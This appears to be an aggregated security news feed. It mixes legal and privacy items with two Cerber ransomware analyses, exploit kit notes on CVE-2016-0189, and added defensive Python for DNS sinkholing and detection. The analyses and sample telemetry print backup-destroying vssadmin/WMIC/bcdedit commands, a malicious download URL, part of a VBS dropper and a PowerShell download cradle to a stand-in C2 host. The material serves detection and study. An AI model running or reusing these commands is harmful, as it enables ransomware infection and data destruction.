As we previously reported, in April 2014 a judge in the U.S. District Court for the Southern District of New York ruled that Microsoft must release user data to U.S. law enforcement when issued a search warrant under the Stored Communications Act (“SCA”), even if the data is stored outside of the U.S. The case stems from a search warrant seeking the contents of all emails, records and other information regarding one of Microsoft’s email users. Microsoft complied with the warrant by producing “non-content” information related to the account (which is stored on U.S. servers), but refused to turn over the contents of the emails that are stored on a server in Ireland. The company argued that U.S. courts are not authorized to issue warrants for extraterritorial search and seizure of emails. The district court judge found that a search warrant for online data is unlike a conventional warrant, stating that if it were treated like a conventional warrant, the burden on the government would be substantial and law enforcement efforts would be impeded.

In reaching its decision to overturn the lower court’s ruling, the Second Circuit held that “Congress did not intend the [SCA’s] warrant provisions to apply extraterritorially…[and] the SCA does not authorize a U.S. court to issue and enforce an SCA warrant against a United States‐based service provider for the contents of a customer’s electronic communications stored on servers located outside the United States.”

UPDATE: On January 25, 2017, the U.S. Court of Appeals for the Second Circuit denied the U.S. Department of Justice’s (“DOJ’s”) request for a rehearing of the case. The DOJ might seek to appeal the decision to the U.S. Supreme Court.

Security Weekly #473 – “Blackholing Your Python”

This week on Security Weekly, Bob Stratton of Mach37 joins us. Joff will write a Python script that downloads malware domain name lists from a URL and creates a bind9-based DNS blackhole configuration file from the domain names obtained. In security news, we discuss Pokemon Go, an FDIC hack, and more. Stay tuned!
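
The script the episode describes, as an added Python example (not Joff's script from the show): it normalizes a downloaded domain list, drops names already covered by a listed parent zone, and emits bind9 zone clauses that point every listed name at one sinkhole zone file. The sample list, the zone file path, the sinkhole address and the never_block allowlist are assumptions.

```python
import re
import urllib.request

# Constructed sample in the mixed formats blocklists commonly use (hosts-file
# lines, bare names, comments). Names are placeholders, not real indicators.
SAMPLE_LIST = """# constructed malware domain list
127.0.0.1 evil-downloads.example
0.0.0.0   cdn.evil-downloads.example
bad.example.
BAD.EXAMPLE   # duplicate differing only in case and trailing dot
not a domain
localhost
"""

DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")
HOSTS_NOISE = {"localhost", "localhost.localdomain", "broadcasthost", "local",
               "ip6-localhost", "ip6-loopback"}


def fetch_list(url):
    """Download a list as text (not exercised offline; kept for completeness)."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        return resp.read().decode("utf-8", "replace")


def normalize_domains(text, never_block=()):
    """Turn a raw list into sorted, unique, validated lowercase domains.
    never_block protects your own and other critical zones from being sinkholed."""
    protected = {d.lower().rstrip(".") for d in never_block}
    found = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        candidate = line.split()[-1].lower().rstrip(".")  # last token survives hosts-file format
        if candidate in HOSTS_NOISE or candidate in protected or not DOMAIN_RE.match(candidate):
            continue
        if any(candidate.endswith("." + p) for p in protected):
            continue
        found.add(candidate)
    return sorted(found)


def collapse_subdomains(domains):
    """Drop names whose parent is already listed: a bind9 zone for the parent
    already answers for every name beneath it."""
    kept = set()
    for d in sorted(set(domains), key=lambda x: x.count(".")):
        labels = d.split(".")
        if any(".".join(labels[i:]) in kept for i in range(1, len(labels))):
            continue
        kept.add(d)
    return sorted(kept)


def render_bind_config(domains, zone_file="/etc/bind/db.blackhole"):
    """One zone clause per domain, all pointing at the same sinkhole zone file."""
    return "\n".join(
        f'zone "{d}" {{ type master; file "{zone_file}"; }};' for d in domains
    )


def render_sinkhole_zone(sink_ip="127.0.0.1", ns="localhost."):
    """Contents of the shared zone file: every name under it resolves to the sinkhole."""
    return "\n".join([
        "$TTL 300",
        f"@ IN SOA {ns} hostmaster.localhost. ( 1 3600 900 604800 300 )",
        f"@ IN NS {ns}",
        f"@ IN A {sink_ip}",
        f"* IN A {sink_ip}",
    ])


def build_blackhole(text, never_block=()):
    """Full pipeline: raw list in, named.conf fragment out."""
    return render_bind_config(collapse_subdomains(normalize_domains(text, never_block)))
```

Include the rendered clauses from named.conf and write render_sinkhole_zone() to the zone file path; queries for any listed name then answer with the sinkhole address instead of reaching the malicious host.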

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup, run and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macro code calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the aforementioned folder, then, after eliminating any blacklisted filenames from an internal list, it creates a renamed copy of itself in “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory. The malware then executes the copy from the new location and cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplishes this by launching the following processes with the arguments shown:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"

Coercion

People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4. Interface provided to the victim to pay ransom supports 12 languages

Encryption

Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers’ geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

Persistence

Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as the Run and RunOnce keys are also used.

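
An added Python example (not FireEye's code) that runs the signals from the attack cycle above over constructed endpoint telemetry: an Office application spawning hidden PowerShell, the vssadmin, WMIC and bcdedit commands listed under Shadow deletion, and the registry and startup-folder persistence entries listed here. The event format, the victim paths, the renamed copy name and the PowerShell download-cradle form are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    kind: str          # "process", "registry" or "file"
    image: str = ""    # acting process image
    parent: str = ""   # parent image (process events)
    cmdline: str = ""  # full command line (process events)
    path: str = ""     # registry value path or file path
    data: str = ""     # registry value data

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Step 7: the backup-destruction commands listed under "Shadow deletion".
SHADOW_RULES = [
    (r"vssadmin(\.exe)?\b.*\bdelete\s+shadows\b", "vssadmin delete shadows"),
    (r"wmic(\.exe)?\b.*\bshadowcopy\s+delete\b", "wmic shadowcopy delete"),
    (r"bcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b", "bcdedit recoveryenabled no"),
    (r"bcdedit(\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b",
     "bcdedit bootstatuspolicy ignoreallfailures"),
]

# Step 6: registry values named under "Persistence"; matched as path suffixes
# so both HKCU and HKLM variants are covered.
PERSISTENCE_VALUES = [
    (r"\\control panel\\desktop\\scrnsave\.exe$", "screensaver hijack"),
    (r"\\command processor\\autorun$", "CommandProcessor AutoRun"),
    (r"\\currentversion\\run\\[^\\]+$", "Run key"),
    (r"\\currentversion\\runonce\\[^\\]+$", "RunOnce key"),
]

def _process_findings(e):
    img, parent, cmd = e.image.lower(), e.parent.lower(), e.cmdline.lower()
    out = []
    if img == "powershell.exe":
        if parent in OFFICE_APPS:
            out.append((2, "Office application spawned PowerShell"))
        if re.search(r"-(w|windowstyle)\s+hidden", cmd):
            out.append((2, "PowerShell started hidden"))
        if re.search(r"-(ep|executionpolicy)\s+bypass", cmd):
            out.append((2, "PowerShell execution policy bypass"))
        if re.search(r"downloadfile|downloadstring|invoke-webrequest", cmd):
            out.append((3, "PowerShell download cradle"))  # cradle form is assumed
    elif parent == "powershell.exe" and img.endswith(".exe") and "\\appdata\\" in cmd:
        out.append((5, f"PowerShell executed dropped binary {e.image}"))
    for pattern, label in SHADOW_RULES:
        if re.search(pattern, cmd):
            out.append((7, label))
    return out

def _registry_findings(e):
    for pattern, label in PERSISTENCE_VALUES:
        if re.search(pattern, e.path.lower()):
            return [(6, f"{label} -> {e.data}")]
    return []

def _file_findings(e):
    p = e.path.lower()
    out = []
    if e.image.lower() == "powershell.exe" and p.endswith(".exe") and "\\appdata\\" in p:
        out.append((4, f"PowerShell wrote executable {e.path}"))
    if re.search(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", p):
        out.append((6, f"startup shortcut {e.path}"))
    return out

def analyze(events):
    """Return (attack_step, description) findings in event order."""
    handlers = {"process": _process_findings, "registry": _registry_findings, "file": _file_findings}
    return [f for e in events for f in handlers.get(e.kind, lambda _e: [])(e)]

def steps_observed(events):
    return sorted({step for step, _ in analyze(events)})

def is_ransomware_chain(events):
    """Alert only when delivery (step 2) is seen with persistence or backup
    destruction (step 6/7), so an admin running vssadmin alone is not flagged."""
    seen = set(steps_observed(events))
    return 2 in seen and bool(seen & {6, 7})

APPDATA = "C:\\Users\\victim\\AppData\\Roaming"  # constructed victim profile
DROPPED = APPDATA + "\\{GUID}\\calc.exe"         # constructed renamed copy
# Constructed telemetry following the eight steps (steps 1 and 8 leave no record here).
SAMPLE_EVENTS = [
    Event("process", image="powershell.exe", parent="WINWORD.EXE",
          cmdline="powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                  "(New-Object Net.WebClient).DownloadFile('http://c2.invalid/p', '"
                  + APPDATA + "\\profilest.exe')"),
    Event("file", image="powershell.exe", path=APPDATA + "\\profilest.exe"),
    Event("process", image="profilest.exe", parent="powershell.exe", cmdline=APPDATA + "\\profilest.exe"),
    Event("registry", path="HKCU\\Control Panel\\Desktop\\SCRNSAVE.EXE", data=DROPPED),
    Event("registry", path="HKCU\\Software\\Microsoft\\Command Processor\\AutoRun", data=DROPPED),
    Event("registry", path="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\calc", data=DROPPED),
    Event("file", path=APPDATA + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc.lnk"),
    Event("process", image="vssadmin.exe", parent="profilest.exe", cmdline="vssadmin.exe delete shadows /all /quiet"),
    Event("process", image="WMIC.exe", parent="profilest.exe", cmdline="WMIC.exe shadowcopy delete"),
    Event("process", image="bcdedit.exe", parent="profilest.exe", cmdline="bcdedit.exe /set {default} recoveryenabled no"),
    Event("process", image="bcdedit.exe", parent="profilest.exe",
          cmdline="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
]
```

Running analyze(SAMPLE_EVENTS) maps each record to the step it belongs to, and is_ransomware_chain() only fires when the delivery stage and a destructive stage are both present.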
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections, or they may not be feasible for your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

Conclusion

Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between discrete individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has transpired or is transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real time. Also, at FireEye, we go one step further and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

Enterprise Security Weekly #9 – Sniffing Each Others’ Farts

This week in the news no excuses to go Phish yourself, a services vendor helps you identify risk, the #1 privileged identity management solution (According to some), and a huge blow to the Endpoint Security Agent market. And we'll talk about how to secure your SDLC. All that and more so stay tuned!

Full Show Notes: http://wiki.securityweekly.com/wiki/index.php/ES_Episode8

CVE-2016-0189 (Internet Explorer) and Exploit Kit

Spotted by Symantec in the wild and patched with MS16-051 in May 2016, CVE-2016-0189 is now being integrated into exploit kits.

Neutrino Exploit Kit :
Here, 2016-07-13, but I am being told that I am late to the party.
It's already [CN] documented here

Neutrino after ScriptJS redirector dropping Locky Affid 13- 2016-07-13


Flash sample in that pass : 85b707cf63abc0f8cfe027153031e853fe452ed02034b792323eecd3bc0f7fd
(Out of topic payload : 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18 - Locky Affid 13 )


Thanks to Malc0de for invaluable help here :)

Files Here: Neutrino_CVE-2016-0189_160714 (Password is malware - VT Link)

Sundown :
Some evidence of CVE-2016-0189 being integrated in Sundown was spotted on July 15 by @criznash.
On the 16th I recorded a pass where CVE-2016-0189 had its own calls:

Sundown exploiting CVE-2016-0189 to drop Smokebot on the 2016-07-16
(Out of topic payload :  61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1 beaconing to : vicolavicolom.com | 185.93.185.224 )
Files : Sundown_CVE-2016-0189_160716 (password is malware)

RIG:
I saw it on 2016-09-12, but it might have appeared before.
RIG successfully exploiting CVE-2016-0189 - 2016-09-12

CVE-2016-0189 from RIG after a 3-step decoding pass

Files : RIG_2016-0189_2016-09-12 (password is malware)

Magnitude:
Here is a pass from 2016-09-16, but it has been inside since at least 2016-09-04 (Source: Trend Micro - Thanks).

CVE-2016-0189 in Magnitude on 2016-09-16
Sorry, I can't share the Fiddler capture publicly in that case (those specific ones would give the attack side too much information about some of the techniques that can be used; you know how to contact me).

Out of topic Payload:  Cerber
a0d9ad48459933348fc301d8479580f8
5298ca5e9933bd20e051b81371942b2c

GrandSoft:
Spotted first on 2017-09-22; here is traffic from 2018-01-30 on: Win10 Build 10240 - IE11.0.10240.16431 - KB3078071

CVE-2016-0189 in GrandSoft on 2018-01-30
Out of topic Payload:  GandCrab Ransomware
a15c48c74a47e81c1c8b26073be58c64f7ff58717694d60b0b5498274e5d9243

Fiddler here : GrandSoft_WorkingonIE11_Win10d.zip (pass is malware)


Edits :
2016-07-15 a previous version was stating CVE-2015-5122 for nw23. Fixed thanks to @dnpushme
2016-07-20 Adding Sundown.
2016-09-17 Adding RIG
2016-09-19 Adding Magnitude
2018-01-30 Adding GrandSoft (but appeared there on 2017-09-22)

Read More :
Patch Analysis of CVE-2016-0189 - 2016-06-22 - Theori
Neutrino EK: fingerprinting in a Flash - 2016-06-28 - Malwarebytes

Post publication Reading :
Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release - 2016-07-14 - FireEye

FTC Issues Warning Letters to Companies Falsely Claiming APEC CBPR Certification

On July 14, 2016, the Federal Trade Commission issued warning letters to 28 companies relating to apparent false claims of participation in the APEC Cross-Border Privacy Rules (“CBPR”).

The warning letters state that the companies’ websites represent APEC CBPR certification even though the companies do not appear to have undertaken the necessary steps to claim certification, such as a review and approval process by an APEC-recognized Accountability Agent.

The letters further inform the companies that falsely claiming participation in an international privacy program such as the CBPR may subject them to an enforcement action under the FTC’s deception authority pursuant to Section 5 of the FTC Act. The letters also request that the companies remove the apparent misrepresentations or contact the FTC with confirmation that they have, in fact, undergone the appropriate certification process.

This APEC CBPR enforcement initiative follows on the FTC’s May announcement of its first APEC CBPR enforcement matter against a company falsely claiming CBPR certification.

The APEC CBPR system is a regional, multilateral, cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. Currently, the U.S., Mexico, Canada and Japan are participants in the APEC CBPR framework. Other APEC economies are in the process of determining how and when they may join.

A Look at the Cerber Office 365 Ransomware

Reports of a zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other zero-day threats that have been popping up like mushrooms of late, the main method of infection is through the use of Office macros.

This blog provides an analysis of the Cerber variant using traditional reverse engineering and ThreatTrack’s newest version of our malware analysis sandbox, ThreatAnalyzer 6.1.

Analyzing Cerber

Reverse engineering in general, more often than not, requires that one gets a broad view of what the target is doing. Whether you’re analyzing a malware sample or trying to figure out what a function does from obfuscated code, it is best to get the general “feel” of your target before narrowing down to the specifics.

ThreatAnalyzer is a sandbox that executes a program, file or URL in a controlled, monitored environment and provides a detailed report enabling the researcher or analyst to get a good look at what the sample will do at run time. It is also worth noting that a sandbox is a good tool for generating threat intelligence to quickly get IOCs (Indicators of Compromise). The latest version of this sandbox, ThreatAnalyzer 6.1, has a built-in behavioral detection mechanism that enables users to see the general behavior of a sample and, based on that particular set of behaviors, predict whether the program in question is malicious or benign.

Fig: ThreatAnalyzer’s unique behavior determination engine

Fig 1: ThreatAnalyzer 6.1 in action

Looking at the figure above, on the analysis screen, ThreatAnalyzer 6.1 has provided the following vital information on this particular sample:

  1. Determines that the sample is detected as malicious on 3 different fronts:
    1. ThreatIQ (our integrated threat intelligence server) observes the sample trying to beacon to blacklisted URLs
    2. The sample is detected by at least one antivirus engine
    3. Based on the behavior it performed, the sample has a high probability of being malicious
  2. Shows the researcher/user the changes in Registry, IO (File), Network attempts it made, and processes that it spawned
  3. Compacts all detailed information that it has gathered into a downloadable PDF or XML report. If a user chooses, he can download the archive, which includes the detailed report, any significant files that were generated, screenshots of the windows spawned and a copy of the PCAP file if any network activities were logged

ThreatAnalyzer also provides a detailed report of the sample you analyzed in XML, JSON or PDF format. These reports contain the processes that were spawned, what files were modified, created or accessed, registries that were manipulated, objects that were created and any network connections that were made.

If we look further at the particular XML file of the sample we analyzed, we can gather the following activities:

  • Spawned WINWORD.EXE (normal since we fed a DOTM file), but the process tree shows that it spawned
    • Cmd.exe
    • Wscript.exe
  • Created a randomly named VBS file in %appdata%
    • %appdata%\15339.vbs
    • Cmd.exe /V /C set "GSI=%APPDATA%\%RANDOM%.vbs" (for %i in ("DIm RWRL" "FuNCtioN GNbiPp(Pt5SZ1)" "EYnt=45" "GNbiPp=AsC(Pt5SZ1)" "Xn1=52" "eNd fuNCtiON" "SUb OjrYyD9()"
  • Seeded another cmd.exe calling the VBS file
  • Made an attempt to connect to
    • httx://solidaritedeproximite.org/mhtr.jpg
  • Made a randomly named .TMP in %appdata% and executed it
    • Hash: ee0828a4e4c195d97313bfc7d4b531f1
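
The cmd.exe line in the report is a for/echo dropper: each quoted item is one line of the VBS file that cmd writes out before handing it to wscript.exe. As an added Python example (not ThreatTrack's code), a small extractor that recovers the script lines and target path from such a command line and tags the traits worth alerting on; the constructed sample reuses the fragments visible above, while the "do @echo ... >> !GSI!" tail and the closing wscript.exe call are assumptions about how the one-liner is completed.

```python
import re

# Constructed command line in the shape of the one ThreatAnalyzer logged above.
# The quoted VBS fragments are the ones visible in the report; the "do @echo ..."
# tail and the closing wscript.exe call are assumptions, not text from the sample.
SAMPLE_CMDLINE = (
    'Cmd.exe /V /C set "GSI=%APPDATA%\\%RANDOM%.vbs" && (for %i in '
    '("DIm RWRL" "FuNCtioN GNbiPp(Pt5SZ1)" "EYnt=45" "GNbiPp=AsC(Pt5SZ1)" '
    '"Xn1=52" "eNd fuNCtiON" "SUb OjrYyD9()") do @echo %~i >> !GSI!) '
    '&& wscript.exe !GSI!'
)

SET_RE = re.compile(r'\bset\s+"?(?P<var>[A-Za-z_]\w*)=(?P<value>[^"&]+)', re.I)
FOR_RE = re.compile(r'\bfor\s+%(?P<loopvar>\w)\s+in\s*\((?P<items>.*?)\)\s*do\s+(?P<body>.+?)(?:\)|$)',
                    re.I | re.S)
QUOTED_RE = re.compile(r'"([^"]*)"')


def extract_dropped_script(cmdline):
    """Recover the script lines a cmd.exe for/echo dropper writes, the path it
    writes them to and the interpreter it hands them to. Returns None if the
    command line holds no for/echo loop."""
    variables = {m.group("var").upper(): m.group("value").strip() for m in SET_RE.finditer(cmdline)}
    loop = FOR_RE.search(cmdline)
    if not loop:
        return None
    lines = QUOTED_RE.findall(loop.group("items"))
    # The echo target is a delayed-expansion (!VAR!) or plain (%VAR%) variable, or a literal path.
    target = re.search(r">>\s*(?:!(\w+)!|%(\w+)%|(\S+))", loop.group("body"))
    script_path = None
    if target:
        name = target.group(1) or target.group(2)
        script_path = variables.get(name.upper()) if name else target.group(3)
    launcher = re.search(r"\b[wc]script(\.exe)?\b", cmdline, re.I)
    return {
        "script_path": script_path,
        "lines": lines,
        "script": "\r\n".join(lines),  # reassembled file, ready for static review
        "launcher": launcher.group(0).lower() if launcher else None,
    }


def triage(cmdline):
    """Tag the dropper traits worth alerting on. Each tag is a separate signal,
    so an ordinary batch one-liner does not trip every rule at once."""
    info = extract_dropped_script(cmdline)
    if info is None:
        return []
    tags = []
    path = (info["script_path"] or "").upper()
    if re.search(r"\s/V(:ON)?\b", cmdline, re.I):
        tags.append("delayed-expansion")
    if "%APPDATA%" in path or "%TEMP%" in path:
        tags.append("drops-to-user-profile")
    if "%RANDOM%" in path:
        tags.append("random-filename")
    if path.endswith((".VBS", ".VBE", ".JS", ".WSF")):
        tags.append("script-payload")
    if info["launcher"]:
        tags.append("launches-" + info["launcher"].split(".")[0])
    # Asc/Chr/Mid calls in the dropped lines point at a string-decoding routine.
    if any(re.search(r"\b(asc|chr|mid)\s*\(", line, re.I) for line in info["lines"]):
        tags.append("string-decoding-routine")
    return tags
```

The same extractor runs unchanged over a command line captured by a process-creation log, so the dropped script can be reviewed without detonating the document again.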

These are highly suspicious activities given that we were trying to analyze an Office document file. The behavior above cannot be classified as normal. So the next time you’re nervous about opening an attachment, even if it came from a person or organization you know, feed it to a sandbox like ThreatAnalyzer and have a look before running it on your production machine.

Good ol’ reverse engineering

Office 365 Enable Content

Looking at how this ransomware was coded, it will not only infect Office 365 users but also users of Office 2007 and above. The macro inside the Document_Open function will auto-execute once the malicious Office attachment is opened. But this also depends on whether macros are enabled or, in earlier Office versions, security is set to low. And quite possibly in an attempt to slow down the analysis process and bypass traditional AV signatures, each iteration of this Cerber macro variant is obfuscated.

Auto-execution macro inside Cerber macro

The macro will then proceed to the creation of a script located in %appdata%. The VBS is also obfuscated but luckily not encrypted. It is interesting to note a particular action that may or may not be an intended feature to bypass behavioral detection. It uses the Timer function to generate a random integer and compares it to a self-generated variable; the outcome of that comparison is the condition on which the code that downloads the cryptor component runs.

Using built-in network features of VBS, it will attempt to connect to a remote server and download a particular file.

httx://solidaritedeproximite.org/mhtr.jpg

This may seem harmless, as it is just a simple JPG file, right? Well, the VBS code also indicates that it will write the contents of that file to a .TMP in %appdata% and execute it. Although this technique has been used by other malware and dates back years, it is still interesting to see here.

Download the file, save it, then Run

MD5 hash: ee0828a4e4c195d97313bfc7d4b531f1

The downloaded file is the cryptor part of the Cerber ransomware. This program is the one responsible for scanning and encrypting target files on a victim’s system. The full analysis of this component will be discussed in a separate blog. It is interesting to note that the downloaded Cerber executable will encrypt your files even in the absence of an Internet connection. The code inside the EXE indicates that it does not connect to a remote server (unlike the ones before it, e.g., CryptoWall, Locky, TeslaCrypt, etc.) to encrypt the victim’s files.

Once a system is successfully infected, it will display the following on the desktop.

And spawn an instance of your browser containing the message:

And play a sound “your documents, photos, databases, and other important files have been encrypted” in a robot voice.

Infection Summary

Flow of the Cerber attack scenario

  1. A spear-phishing email that contains a malicious Office attachment arrives.
  2. If the user opens the email, executes the attachment AND the macro setting for Office is set to enabled, the macro will execute, spawning another VBS script.
  3. The script will contact a remote server, then download and execute the cryptor part of the Cerber ransomware.
  4. The cryptor proceeds to scan and encrypt the user’s files.
  5. It displays a notice that your system has been infected by Cerber ransomware.

The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

European Commission Adopts Privacy Shield

On July 12, 2016, the EU Commissioner for Justice, Consumers and Gender Equality, Věra Jourová, and U.S. Secretary of Commerce Penny Pritzker announced the formal adoption of the EU-U.S. Privacy Shield (the “Privacy Shield”) framework, composed of an Adequacy Decision and accompanying Annexes.

The Privacy Shield is designed to protect the fundamental rights of individuals whose personal data is transferred to the U.S. and ensure legal certainty for businesses with respect to transatlantic transfers of personal data.

The European Commission outlines the following principles of the new framework:

  • Strong obligations on companies handling personal data. The Privacy Shield includes stricter oversight mechanisms to help ensure companies abide by their commitments, including regular monitoring by the U.S. Department of Commerce. The Privacy Shield also includes stricter conditions for onward transfers of personal data to third parties by participating companies.
